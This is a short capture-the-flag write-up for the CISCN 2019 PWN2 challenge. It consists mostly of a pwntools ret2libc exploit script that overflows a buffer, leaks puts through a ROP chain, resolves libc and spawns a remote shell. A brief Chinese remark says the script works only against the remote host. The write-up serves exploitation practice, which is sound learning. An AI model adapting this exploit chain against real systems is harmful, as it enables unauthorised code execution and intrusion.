[CISCN 2019东北]PWN2 https://www.nssctf.cn/problem/95
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 from pwn import *from LibcSearcher import *context.log_level = "debug" p = remote("node5.anna.nssctf.cn" ,21739 ) elf = ELF("/home/pwn/10ret2libc64_ciscn/ciscn_2019_pwn2" ) puts_got = elf.got["puts" ] puts_plt = elf.plt["puts" ] encrypt_addr = elf.sym["encrypt" ] ret_addr = 0x4006b9 rdi_addr = 0x400c83 payload = b'a' *0x58 + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr) p.recvuntil("Input your choice!" .encode()) p.sendline("1" .encode()) p.recvuntil('Input your Plaintext to be encrypted\n' .encode()) p.sendline(payload) puts_addr = u64(p.recvuntil(b'\x7f' )[-6 :].ljust(8 ,b'\x00' )) success('put_add -> {:#x}' .format (puts_addr)) libc = LibcSearcher("puts" , puts_addr) libc_addr = puts_addr - libc.dump("puts" ) bin_sh_addr = libc_addr + libc.dump("str_bin_sh" ) system_addr = libc_addr + libc.dump("system" ) success('libc_add -> {:#x}' .format (libc_addr)) success('bin_sh_add -> {:#x}' .format (bin_sh_addr)) success('system_add -> {:#x}' .format (system_addr)) payload = b'a' *0x58 + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) p.recvuntil("Input your Plaintext to be encrypted\n" .encode()) p.sendline(payload) p.interactive()
以上脚本远程可以通,本地却走不通。应该就是我本地的libc版本的问题,也懒得调了,学完libc就跑。不再看pwn了。
